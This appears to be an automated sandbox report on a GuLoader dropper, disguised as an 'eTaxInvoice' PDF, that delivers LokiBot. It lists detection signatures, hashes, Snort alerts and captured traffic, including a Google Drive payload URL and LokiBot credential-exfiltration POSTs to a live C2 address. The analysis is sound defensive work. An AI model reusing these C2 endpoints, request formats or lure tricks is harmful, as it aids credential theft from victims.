Loading ...

Play interactive tourEdit tour

Windows Analysis Report NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe

Overview

General Information

Sample Name:NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe
Analysis ID:532411
MD5:9ff3b37069e0772af03732b022c02789
SHA1:ebaa34d6e69a4a33ad40ac64791b5f6366b7be9c
SHA256:18b734b7b7da572d6ae29aedc5d0105e6b0ad96ba6c9bd100710b147d53f1a3b
Tags:exeLoki
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for dropped file
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe (PID: 4128 cmdline: "C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe" MD5: 9FF3B37069E0772AF03732B022C02789)
    • Form_Pilleorms8.exe (PID: 6560 cmdline: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe MD5: 6196B71B6602AA420325B1124C64B20A)
      • Form_Pilleorms8.exe (PID: 7148 cmdline: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe MD5: 6196B71B6602AA420325B1124C64B20A)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=downlf"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000000.787227598.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000001.00000002.788404453.0000000008160000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Overview

      No Sigma rule has matched

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000009.00000000.787227598.0000000000560000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downlf"}
      Multi AV Scanner detection for submitted fileShow sources
      Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeVirustotal: Detection: 50%Perma Link
      Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeReversingLabs: Detection: 53%
      Antivirus detection for URL or domainShow sources
      Source: http://63.250.34.171/tickets.php?id=156Avira URL Cloud: Label: malware
      Multi AV Scanner detection for domain / URLShow sources
      Source: http://63.250.34.171/tickets.php?id=156Virustotal: Detection: 8%Perma Link
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeJoe Sandbox ML: detected
      Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: unknownHTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.4:49807 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.203.97:443 -> 192.168.2.4:49808 version: TLS 1.2
      Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49810 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49810 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49810 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49810 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49811 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49811 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49811 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49811 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49812 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49812 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49812 -> 63.250.34.171:80
      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49812 -> 63.250.34.171:80
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=downlf
      Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Joe Sandbox ViewIP Address: 63.250.34.171 63.250.34.171
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1vel8-ekCr0ivRl8u50SHCZNZh1tCa62N HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: CONSENT=YES+GB.en-GB+V9+BX
      Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/e3qi22h3f39crtgptlkpn346psio1vva/1638430350000/13431600623523591888/*/1vel8-ekCr0ivRl8u50SHCZNZh1tCa62N?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0s-8g-docs.googleusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 413CA904Content-Length: 190Connection: close
      Source: global trafficHTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 413CA904Content-Length: 190Connection: close
      Source: global trafficHTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 413CA904Content-Length: 163Connection: close
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 02 Dec 2021 07:33:46 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 02 Dec 2021 07:33:50 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 02 Dec 2021 07:33:53 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: unknownTCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Form_Pilleorms8.exe, 00000009.00000003.867261601.0000000000830000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000003.867343990.0000000000834000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000003.867323522.0000000000834000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
      Source: Form_Pilleorms8.exe, 00000009.00000003.867261601.0000000000830000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000003.867343990.0000000000834000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000003.867323522.0000000000834000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
      Source: Form_Pilleorms8.exe, 00000009.00000002.898001784.000000001E5B3000.00000004.00000001.sdmpString found in binary or memory: https://doc-0s-8g-docs.googleusercontent.com/
      Source: Form_Pilleorms8.exe, 00000009.00000003.867334806.0000000000839000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000003.868205288.0000000000836000.00000004.00000001.sdmpString found in binary or memory: https://doc-0s-8g-docs.googleusercontent.com/aF/T
      Source: Form_Pilleorms8.exe, 00000009.00000003.867323522.0000000000834000.00000004.00000001.sdmpString found in binary or memory: https://doc-0s-8g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/e3qi22h3
      Source: Form_Pilleorms8.exe, 00000009.00000002.890831982.0000000002310000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1vel8-ekCr0ivRl8u50SHCZNZh1tCa62N
      Source: unknownHTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 413CA904Content-Length: 190Connection: close
      Source: unknownDNS traffic detected: queries for: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1vel8-ekCr0ivRl8u50SHCZNZh1tCa62N HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: CONSENT=YES+GB.en-GB+V9+BX
      Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/e3qi22h3f39crtgptlkpn346psio1vva/1638430350000/13431600623523591888/*/1vel8-ekCr0ivRl8u50SHCZNZh1tCa62N?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0s-8g-docs.googleusercontent.comConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.4:49807 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.203.97:443 -> 192.168.2.4:49808 version: TLS 1.2
      Source: Form_Pilleorms8.exe, 00000001.00000002.787996138.00000000065BA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeCode function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056DE

      System Summary:

      barindex
      Initial sample is a PE file and has a suspicious nameShow sources
      Source: initial sampleStatic PE information: Filename: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe
      Executable has a suspicious name (potential lure to open the executable)Show sources
      Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeStatic file information: Suspicious name
      Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeCode function: 0_2_0040755C0_2_0040755C
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeCode function: 0_2_00406D850_2_00406D85
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 1_2_081696A01_2_081696A0
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 1_2_081677A91_2_081677A9
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 1_2_081692DD1_2_081692DD
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 1_2_0816EFE31_2_0816EFE3
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 1_2_08169B351_2_08169B35
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 1_2_0816DC4B1_2_0816DC4B
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 1_2_0816D16C1_2_0816D16C
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 1_2_0816D9B31_2_0816D9B3
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 1_2_0816EA76 NtProtectVirtualMemory,1_2_0816EA76
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 1_2_081696A0 NtAllocateVirtualMemory,1_2_081696A0
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 1_2_081677A9 NtWriteVirtualMemory,1_2_081677A9
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 1_2_0816EFE3 NtMapViewOfSection,1_2_0816EFE3
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 9_2_0056FE51 Sleep,NtProtectVirtualMemory,9_2_0056FE51
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 9_2_0056FC9B LdrInitializeThunk,NtProtectVirtualMemory,9_2_0056FC9B
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 9_2_0056FCD3 LdrInitializeThunk,NtProtectVirtualMemory,9_2_0056FCD3
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 9_2_0056FEC7 Sleep,NtProtectVirtualMemory,9_2_0056FEC7
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 9_2_0056FDF3 NtProtectVirtualMemory,9_2_0056FDF3
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 9_2_0056FD7B NtProtectVirtualMemory,9_2_0056FD7B
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 9_2_0056FEE2 NtProtectVirtualMemory,9_2_0056FEE2
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 9_2_0056FC96 LdrInitializeThunk,NtProtectVirtualMemory,9_2_0056FC96
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 9_2_0056FD97 NtProtectVirtualMemory,9_2_0056FD97
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 9_2_0056FD15 LdrInitializeThunk,NtProtectVirtualMemory,9_2_0056FD15
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 9_2_0056FF91 NtProtectVirtualMemory,9_2_0056FF91
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 9_2_0056FF9D NtProtectVirtualMemory,9_2_0056FF9D
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 9_2_0056FDB9 NtProtectVirtualMemory,9_2_0056FDB9
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 9_2_0056FD23 LdrInitializeThunk,NtProtectVirtualMemory,9_2_0056FD23
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess Stats: CPU usage > 98%
      Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe, 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameForm_Pilleorms8.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGP